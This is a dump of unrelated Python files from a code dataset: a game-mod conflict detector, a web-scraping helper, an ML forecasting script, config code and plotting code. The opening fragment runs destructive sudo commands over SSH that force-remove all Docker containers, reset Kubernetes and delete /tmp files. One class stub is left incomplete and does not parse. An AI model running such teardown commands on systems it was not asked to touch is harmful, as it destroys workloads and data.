execute_command_ssh(ssh, 'docker rm --force $(sudo docker ps -q)',
sudo=True)
# Destroy kubernetes.
execute_command_ssh(ssh, 'kubeadm reset --force',
sudo=True)
# Remove corefiles leftovers.
execute_command_ssh(ssh, 'rm -f /tmp/*tar.lzo.lrz.xz*',
sudo=True)
# Remove corefiles leftovers.
execute_command_ssh(ssh, 'rm -f /tmp/*core*',
sudo=True)
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
1654861 | <reponame>NicolasGrosjean/Paradox_Conflict_Detector
import argparse
import os
def get_args():
parser = argparse.ArgumentParser(
description="Detect conflicts between Paradox mods"
)
parser.add_argument(
"mod_repo_path",
type=str,
help="Path of the directory containing all the mods",
)
parser.add_argument(
"file_exception_path",
type=str,
help="Path of a file containing at each line a file name which can duplicated between mods",
)
parser.add_argument(
"-filtering_mod_path",
type=str,
help="Path of a file containing at each line a mod name in which conflicts will be computed",
)
parser.add_argument(
"-playset_name",
type=str,
help="Name of playset saved in Paradox launcher to compute conflicts only on these mods. Can be chained with filtering_mod_path",
)
return parser.parse_args()
class ModMetadata:
name: str
path: str
NORMAL_DUPLICATED_FILES = ["descriptor.mod", "thumbnail.png"]
def read_param_file(path: str) -> list[str]:
with open(path, "r") as f:
lines = f.readlines()
for i in range(len(lines)):
lines[i] = lines[i].replace("\n", "")
return lines
def read_mod_descriptor_file(path: str) -> ModMetadata:
res = ModMetadata()
with open(path, "r") as f:
lines = f.readlines()
for line in lines:
s_line = line.split("=")
if s_line[0] == "name":
res.name = s_line[1].replace("\n", "").replace('"', "")
elif s_line[0] == "path":
res.path = s_line[1].replace("\n", "").replace('"', "")
return res
def list_mod_files(mod_path: str) -> set[str]:
res = set()
for _, _, files in os.walk(mod_path):
for file in files:
res.add(file)
return res
def index_mod_by_files(
mod_repo_path: str,
filtering_mod_names: list[str],
filtering_mod_files: list[str],
) -> dict:
"""
Return dictionary with file names as keys, and list of mod names (from mod_repo_path) which have this file.
Mods are filtered by their names or path in the list if the list is not empty.
"""
mods_by_file = dict()
filtering_names = len(filtering_mod_names) > 0
filtering_files = len(filtering_mod_files) > 0
for mod_desc_file in os.listdir(mod_repo_path):
if not mod_desc_file.endswith("mod"):
continue
metadata = read_mod_descriptor_file(os.path.join(mod_repo_path, mod_desc_file))
if filtering_names:
if metadata.name not in filtering_mod_names:
if mod_desc_file in filtering_mod_files:
filtering_mod_files.remove(mod_desc_file)
continue
else:
filtering_mod_names.remove(metadata.name)
if filtering_files:
if mod_desc_file not in filtering_mod_files:
continue
else:
filtering_mod_files.remove(mod_desc_file)
mod_files = list_mod_files(
os.path.join(mod_repo_path, metadata.path[4:])
if metadata.path.startswith("mod/")
else metadata.path
)
for file in mod_files:
if file not in mods_by_file:
mods_by_file[file] = []
mods_by_file[file].append(metadata.name)
if len(filtering_mod_names) > 0:
print(
f"ERROR : {len(filtering_mod_names)} mods not found : {filtering_mod_names}\n\n"
)
if len(filtering_mod_files) > 0:
print(
f"ERROR : {len(filtering_mod_files)} mods not found : {filtering_mod_files}\n\n"
)
return mods_by_file
def detect_conflicts(
mod_repo_path: str,
file_exceptions=NORMAL_DUPLICATED_FILES,
filtering_mod_names=[],
filtering_mod_files=[],
) -> dict:
"""
Return dictionary according this example: { mod1: { mod2: ['file1', 'file2], mod3: ['file42']}}
Returned files are not in file_exceptions
"""
conflicts_by_mod = dict()
mods_by_file = index_mod_by_files(
mod_repo_path, filtering_mod_names, filtering_mod_files
)
for file, mods in mods_by_file.items():
if len(mods) > 1 and file not in file_exceptions:
for mod in mods:
if mod not in conflicts_by_mod:
conflicts_by_mod[mod] = dict()
for mod2 in mods:
if mod == mod2:
continue
if mod2 not in conflicts_by_mod[mod]:
conflicts_by_mod[mod][mod2] = []
conflicts_by_mod[mod][mod2].append(file)
return conflicts_by_mod
if __name__ == "__main__":
args = get_args()
file_exceptions = read_param_file(args.file_exception_path)
filtering_mod_names = []
filtering_mod_files = []
if args.filtering_mod_path is not None:
filtering_mod_names = read_param_file(args.filtering_mod_path)
if args.playset_name is not None:
from read_playset import read_playsets # Import here to avoid dependency in sqlite3 if not needed
playsets = read_playsets(
os.path.join(args.mod_repo_path, "..", "launcher-v2.sqlite")
).values()
playset_found = False
for playset in playsets:
if args.playset_name == playset["name"]:
for mod in playset["mods"]:
filtering_mod_files.append(mod['mod_file_name'])
playset_found = True
break
if not playset_found:
print(f"ERROR: playset {args.playset_name} not found")
exit(0)
conflicts_by_mod = detect_conflicts(
args.mod_repo_path,
file_exceptions,
filtering_mod_names,
filtering_mod_files
)
for mod in conflicts_by_mod:
print(f"Conflicts with {mod}:")
for mod2 in conflicts_by_mod[mod]:
print(f"- {mod2}: {conflicts_by_mod[mod][mod2]}")
print("\n")
| StarcoderdataPython |
3276674 | ##Patterns: E1124
def my_method(arg1, arg2):
print arg1 + arg2
def main():
##Err: E1124
my_method(1, arg1=2)
my_method(1, 2) | StarcoderdataPython |
116562 | import torch
# Methods for calculating properties of simulation system
class Observables():
def __init__(self, observable_dict):
supported_observables = ['kinetic_energy', 'angles']
def kinetic_energy(self, ): | StarcoderdataPython |
3352189 | # convenience wrapper for urllib2 & friends
import cookielib
import json
import urllib
import urllib2
import urlparse
import re
from urllib import quote, quote_plus as _quote_plus
from lxml import etree, html
from bs4 import BeautifulSoup
# used in plugins that import this
from urllib2 import URLError, HTTPError
ua_firefox = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0' \
' Firefox/17.0'
ua_old_firefox = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; ' \
'rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
ua_internetexplorer = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
ua_chrome = 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, ' \
'like Gecko) Chrome/22.0.1229.79 Safari/537.4'
jar = cookielib.CookieJar()
def get(*args, **kwargs):
return open(*args, **kwargs).read()
def get_url(*args, **kwargs):
return open(*args, **kwargs).geturl()
def get_html(*args, **kwargs):
return html.fromstring(get(*args, **kwargs))
def get_soup(*args, **kwargs):
return BeautifulSoup(get(*args, **kwargs), 'lxml')
def get_xml(*args, **kwargs):
return etree.fromstring(get(*args, **kwargs))
def get_json(*args, **kwargs):
return json.loads(get(*args, **kwargs))
def open(url, query_params=None, user_agent=None, post_data=None,
referer=None, get_method=None, cookies=False, **kwargs):
if query_params is None:
query_params = {}
if user_agent is None:
user_agent = ua_firefox
query_params.update(kwargs)
url = prepare_url(url, query_params)
request = urllib2.Request(url, post_data)
if get_method is not None:
request.get_method = lambda: get_method
request.add_header('User-Agent', user_agent)
if referer is not None:
request.add_header('Referer', referer)
if cookies:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
else:
opener = urllib2.build_opener()
return opener.open(request)
def prepare_url(url, queries):
if queries:
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
query = dict(urlparse.parse_qsl(query))
query.update(queries)
query = urllib.urlencode(dict((to_utf8(key), to_utf8(value))
for key, value in query.iteritems()))
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
return url
def to_utf8(s):
if isinstance(s, unicode):
return s.encode('utf8', 'ignore')
else:
return str(s)
# def quote(s):
# return urllib.quote(s)
def quote_plus(s):
return _quote_plus(to_utf8(s))
def unquote(s):
return urllib.unquote(s)
def unescape(s):
if not s.strip():
return s
return html.fromstring(s).text_content()
def strip_html(html):
tag = False
quote = False
out = ""
for c in html:
if c == '<' and not quote: tag = True
elif c == '>' and not quote: tag = False
elif (c == '"' or c == "'") and tag: quote = not quote
elif not tag: out = out + c
return out
def decode_html(string):
import re
entity_re = re.compile("&(#?)(\d{1,5}|\w{1,8});")
def substitute_entity(match):
from htmlentitydefs import name2codepoint as n2cp
ent = match.group(2)
if match.group(1) == "#":
return unichr(int(ent))
else:
cp = n2cp.get(ent)
if cp:
return unichr(cp)
else:
return match.group()
return entity_re.subn(substitute_entity, string)[0]
def clean_html(string):
import HTMLParser
h = HTMLParser.HTMLParser()
return h.unescape(string)
#clean up html chars
#out = HTMLParser.HTMLParser().unescape(out)
#out = out.replace("&","&").replace(""",'"').replace(''',"'").replace("<","<").replace(">",">").replace("–","-").replace('/','/')
#.renderContents().strip().decode('utf-8').replace('<br/>', ' ')
# post = re.sub('[\s]{3,}',' ',post) #remove multiple spaces
def process_text(string):
try: string = string.replace('<br/>',' ').replace('\n',' ')
except: pass
string = re.sub('>>\d*[\s]','',string) #remove quoted posts
string = re.sub('(>>\d*)','',string)
try: string = unicode(string, "utf8")
except: pass
try: string = strip_html(string)
except: pass
try: string = decode_html(string)
except: pass
try: string = string.decode('utf-8').strip()
except: pass
string = re.sub('[\s]{3,}',' ',string)
return string
def is_active(url):
try:
f = urllib2.urlopen(urllib2.Request(url))
return True
except:
return False
def get_element(soup,element,idclass=None,selector=None):
if idclass: result = soup.find(element, {idclass: selector}).renderContents().strip()
else: result = soup.find(element).renderContents().strip()
return process_text(result)
# while u',,' in page:
# page = page.replace(u',,', u',"",') | StarcoderdataPython |
170288 | <gh_stars>1-10
class Solution:
def brokenCalc(self, X: int, Y: int) -> int:
count = 0
while Y>X:
if Y%2==0:
Y //= 2
else:
Y += 1
count += 1
return count + X - Y
| StarcoderdataPython |
1740319 | <reponame>thinkgradient/solution-accelerator-many-models
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from azureml.core import Run
import pandas as pd
import numpy as np
import os
import argparse
import datetime
import joblib
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn.linear_model import LinearRegression
from timeseries_utilities import ColumnDropper, SimpleLagger, SimpleCalendarFeaturizer, SimpleForecaster
# 0.0 Parse input arguments
parser = argparse.ArgumentParser("split")
parser.add_argument("--target_column", type=str, required=True, help="input target column")
parser.add_argument("--timestamp_column", type=str, required=True, help="input timestamp column")
parser.add_argument("--timeseries_id_columns", type=str, nargs='*', required=True,
help="input columns identifying the timeseries")
parser.add_argument("--drop_columns", type=str, nargs='*', default=[],
help="list of columns to drop prior to modeling")
parser.add_argument("--model_type", type=str, required=True, help="input model type")
parser.add_argument("--test_size", type=int, required=True, help="number of observations to be used for testing")
args, _ = parser.parse_known_args()
current_run = None
def init():
global current_run
current_run = Run.get_context()
def run(input_data):
# 1.0 Set up output directory and the results list
os.makedirs('./outputs', exist_ok=True)
result_list = []
# 2.0 Loop through each file in the batch
# The number of files in each batch is controlled by the mini_batch_size parameter of ParallelRunConfig
for idx, csv_file_path in enumerate(input_data):
result = {}
start_datetime = datetime.datetime.now()
file_name = os.path.basename(csv_file_path)[:-4]
model_name = args.model_type + '_' + file_name
# 1.0 Read the data from CSV - parse timestamps as datetime type and put the time in the index
data = (pd.read_csv(csv_file_path, parse_dates=[args.timestamp_column], header=0)
.set_index(args.timestamp_column)
.sort_index(ascending=True))
# 2.0 Split the data into train and test sets
train = data[:-args.test_size]
test = data[-args.test_size:]
# 3.0 Create and fit the forecasting pipeline
# The pipeline will drop unhelpful features, make a calendar feature, and make lag features
lagger = SimpleLagger(args.target_column, lag_orders=[1, 2, 3, 4])
transform_steps = [('column_dropper', ColumnDropper(args.drop_columns)),
('calendar_featurizer', SimpleCalendarFeaturizer()), ('lagger', lagger)]
forecaster = SimpleForecaster(transform_steps, LinearRegression(), args.target_column, args.timestamp_column)
forecaster.fit(train)
print('Featurized data example:')
print(forecaster.transform(train).head())
# 4.0 Get predictions on test set
forecasts = forecaster.forecast(test)
compare_data = test.assign(forecasts=forecasts).dropna()
# 5.0 Calculate accuracy metrics for the fit
mse = mean_squared_error(compare_data[args.target_column], compare_data['forecasts'])
rmse = np.sqrt(mse)
mae = mean_absolute_error(compare_data[args.target_column], compare_data['forecasts'])
actuals = compare_data[args.target_column].values
preds = compare_data['forecasts'].values
mape = np.mean(np.abs((actuals - preds) / actuals) * 100)
# 6.0 Log metrics
current_run.log(model_name + '_mse', mse)
current_run.log(model_name + '_rmse', rmse)
current_run.log(model_name + '_mae', mae)
current_run.log(model_name + '_mape', mape)
# 7.0 Train model with full dataset
forecaster.fit(data)
# 8.0 Save the forecasting pipeline
joblib.dump(forecaster, filename=os.path.join('./outputs/', model_name))
# 9.0 Register the model to the workspace
# Uses the values in the timeseries id columns from the first row of data to form tags for the model
current_run.upload_file(model_name, os.path.join('./outputs/', model_name))
ts_id_dict = {id_col: str(data[id_col].iloc[0]) for id_col in args.timeseries_id_columns}
tags_dict = {**ts_id_dict, 'ModelType': args.model_type}
current_run.register_model(model_path=model_name, model_name=model_name,
model_framework=args.model_type, tags=tags_dict)
# 10.0 Add data to output
end_datetime = datetime.datetime.now()
result.update(ts_id_dict)
result['model_type'] = args.model_type
result['file_name'] = file_name
result['model_name'] = model_name
result['start_date'] = str(start_datetime)
result['end_date'] = str(end_datetime)
result['duration'] = str(end_datetime-start_datetime)
result['mse'] = mse
result['rmse'] = rmse
result['mae'] = mae
result['mape'] = mape
result['index'] = idx
result['num_models'] = len(input_data)
result['status'] = current_run.get_status()
print('ending (' + csv_file_path + ') ' + str(end_datetime))
result_list.append(result)
# Data returned by this function will be available in parallel_run_step.txt
return pd.DataFrame(result_list)
| StarcoderdataPython |
1769470 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo.config import cfg
from st2common import config as st2cfg
from st2common.constants.system import VERSION_STRING
CONF = cfg.CONF
def _register_common_opts(ignore_errors=False):
st2cfg.register_opts(ignore_errors=ignore_errors)
def _register_sensor_container_opts(ignore_errors=False):
logging_opts = [
cfg.StrOpt('logging', default='conf/logging.sensorcontainer.conf',
help='location of the logging.conf file')
]
st2cfg.do_register_opts(logging_opts, group='sensorcontainer', ignore_errors=ignore_errors)
sensor_test_opt = cfg.StrOpt('sensor-name', help='Only run sensor with the provided name.')
st2cfg.do_register_cli_opts(sensor_test_opt, ignore_errors=ignore_errors)
st2_webhook_opts = [
cfg.StrOpt('host', default='0.0.0.0', help='Host for the st2 webhook endpoint.'),
cfg.IntOpt('port', default='6000', help='Port for the st2 webhook endpoint.'),
cfg.StrOpt('url', default='/webhooks/st2/', help='URL of the st2 webhook endpoint.')
]
st2cfg.do_register_opts(st2_webhook_opts, group='st2_webhook_sensor',
ignore_errors=ignore_errors)
generic_webhook_opts = [
cfg.StrOpt('host', default='0.0.0.0', help='Host for the generic webhook endpoint.'),
cfg.IntOpt('port', default='6001', help='Port for the generic webhook endpoint.'),
cfg.StrOpt('url', default='/webhooks/generic/', help='URL of the st2 webhook endpoint.')
]
st2cfg.do_register_opts(generic_webhook_opts, group='generic_webhook_sensor',
ignore_errors=ignore_errors)
def register_opts(ignore_errors=False):
_register_common_opts(ignore_errors=ignore_errors)
_register_sensor_container_opts(ignore_errors=ignore_errors)
register_opts(ignore_errors=True)
def parse_args(args=None):
CONF(args=args, version=VERSION_STRING)
| StarcoderdataPython |
1648685 | from mighty.forms.widgets.date import DateInput
from mighty.forms.widgets.time import TimeInput
from mighty.forms.widgets.ckeditor import Document, Classic
from mighty.forms.widgets.signature import SignatureInput
__all__ = (
DateInput, TimeInput, Document, Classic, SignatureInput
) | StarcoderdataPython |
88577 | <filename>problem0426.py
###########################
#
# #426 Box-ball system - Project Euler
# https://projecteuler.net/problem=426
#
# Code by <NAME>
#
###########################
| StarcoderdataPython |
3325003 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import joblib as jl
from matplotlib.patches import ConnectionPatch
plt.style.use('figstyle.mplstyle')
def style_plot(fig, axes):
fig.subplots_adjust(hspace=0.1)
for i, ax in enumerate(axes):
ax.patch.set_alpha(0.0)
side = ['left', 'right'][i % 2]
for _, spine in ax.spines.items():
spine.set_visible(False)
ax.spines[side].set_visible(True)
ax.yaxis.set_label_position(side)
ax.yaxis.set_ticks_position(side)
ax.xaxis.set_ticks_position('none')
axes[0].spines['top'].set_visible(True)
axes[0].xaxis.set_label_position('top')
axes[-1].spines['bottom'].set_visible(True)
axes[-1].xaxis.set_ticks_position('bottom')
axes[0].xaxis.set_ticks_position('top')
return fig, axes
def vmarker(x0, x1, ax0, ax1, **kwargs):
xy0 = (x0, ax0.get_ylim()[0])
xy1 = (x1, ax1.get_ylim()[1])
ax0.axvline(x0, **kwargs)
ax1.axvline(x1, **kwargs)
con = ConnectionPatch(xy0, xy1, 'data', 'data', ax0, ax1, **kwargs)
ax0.add_artist(con)
def calc_med_iqr(y, q=[5, 95], axis=None):
qs = np.percentile(y, [q[0], 50, q[-1]], axis=axis)
yerr = np.diff(qs, axis=0)
y = qs[1]
return y, yerr
def calc_point_lags(t0_1, dt_1, t0_2=0, dt_2=0):
dt0 = t0_1 - t0_2
dtm = t0_1 + 0.5 * dt_1 - (t0_2 + 0.5 * dt_2)
dt1 = t0_1 + dt_1 - (t0_2 + dt_2)
return dt0, dtm, dt1
iso_data = iso_data = pd.read_csv('data/NGRIP_10yr.csv', usecols=(0, 4), comment='#')
iso_data = iso_data.loc[(iso_data['Age_BP'] > 10000) &
(iso_data['Age_BP'] <= 60000), :]
gi_table = pd.read_table('data/GIS_table.txt', comment='#')
gi_table = gi_table[['GI' in s or 'Holocene' in s for s in gi_table['Event']]]
gi_table = gi_table[gi_table['Age'] < 60000]
gi_table = gi_table[np.any(gi_table[['NGRIP_Ca', 'NGRIP_Na', 'NGRIP_lt',
'NEEM_Ca', 'NEEM_Na']] == 1.0, axis=1)]
fig, axes = plt.subplots(nrows=4, sharex=False, figsize=(1.414 * 7, 7))
# Isotope data
axes[0].plot(iso_data['Age_BP'] / 1000, iso_data['d18O'], color='k', lw=0.25)
ref_par = 'Na'
x_plt = pd.Series(np.arange(len(gi_table)), gi_table['Event'])
dx = -0.225
# Calcium
for fmt, CORE in zip(('^', 'o'), ['NEEM', 'NGRIP']):
traces = jl.load('ramp_fits/traces/%s.gz' % CORE) \
.sel(param=['Ca', ref_par]).dropna(dim='event')
x = x_plt[np.array(traces.coords['event'])]
dt0, dtm, dt1 = calc_point_lags(traces.sel(param='Ca', model='t0'),
traces.sel(param='Ca', model='dt'),
traces.sel(param=ref_par, model='t0'),
traces.sel(param=ref_par, model='dt'),)
for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
y, yerr = calc_med_iqr(tr, axis=0)
ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
elinewidth=0.75, color='#984ea3',
label='Ca$^{2+}$ (%s)' % CORE)
dx += 0.15
# layer thickness
traces = jl.load('ramp_fits/traces/NGRIP.gz') \
.sel(param=['lt', ref_par]).dropna(dim='event')
x = x_plt[np.array(traces.coords['event'])]
dt0, dtm, dt1 = calc_point_lags(traces.sel(param='lt', model='t0'),
traces.sel(param='lt', model='dt'),
traces.sel(param=ref_par, model='t0'),
traces.sel(param=ref_par, model='dt'),)
for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
y, yerr = calc_med_iqr(tr, axis=0)
ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
elinewidth=0.75, color='#4daf4a',
label='$\lambda$ (NGRIP)')
dx += 0.15
traces = jl.load('ramp_fits/traces/NGRIP.gz') \
.sel(param=['d18O', ref_par]).dropna(dim='event')
x = x_plt[np.array(traces.coords['event'])]
dt0, dtm, dt1 = calc_point_lags(traces.sel(param='d18O', model='t0'),
traces.sel(param='d18O', model='dt'),
traces.sel(param=ref_par, model='t0'),
traces.sel(param=ref_par, model='dt'),)
for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
y, yerr = calc_med_iqr(tr, axis=0)
ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
elinewidth=0.75, color='0.5', label='$\delta^{18}$O (NGRIP)')
dx += 0.15
for i, a in enumerate(gi_table['Age'] / 1000):
vmarker(a, i, axes[0], axes[1], lw=0.2, ls='solid', zorder=-100)
vmarker(i, i, axes[1], axes[2], lw=0.2, ls='solid', zorder=-100)
vmarker(i, i, axes[2], axes[3], lw=0.2, ls='solid', zorder=-100)
for ax in axes[1:]:
ax.set_xlim(-1.0, len(x_plt))
ax.axhline(0.0, zorder=-100, lw=0.25, ls='solid')
axes[0].set_ylabel('$\delta^{18}\mathrm{O}$ (‰)')
axes[1].set_ylabel('Onset lag (yr)')
axes[2].set_ylabel('Midpoint lag (yr)')
axes[3].set_ylabel('Endpoint lag (yr)')
axes[0].set_xlabel('GICC05 Age (kyr before 1950)')
axes[0].xaxis.set_major_locator(plt.MultipleLocator(10))
axes[0].xaxis.set_minor_locator(plt.MultipleLocator(2))
axes[-1].set_xlabel('Onset of…')
fig, axes = style_plot(fig, axes)
axes[1].xaxis.set_ticks(())
axes[2].xaxis.set_ticks(())
axes[-1].xaxis.set_ticks(np.arange(len(gi_table)))
axes[-1].xaxis.set_ticklabels(gi_table['Event'],
rotation=30, va='top', ha='right')
legend_ax = axes[-1]
legend_ax.legend(loc='lower right', fontsize=5, ncol=4,
frameon=True, framealpha=1.0,
edgecolor='white', facecolor='white',
columnspacing=0.2, borderpad=0.2)
for l, ax in zip(('a', 'b', 'c', 'd'), axes):
ax.text(0.01, 0.95, '(%s)'% l, ha='left', va='top', transform=ax.transAxes,
weight='bold', fontsize=7)
fig.savefig('figures/fig_03_timing_diffs.pdf')
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.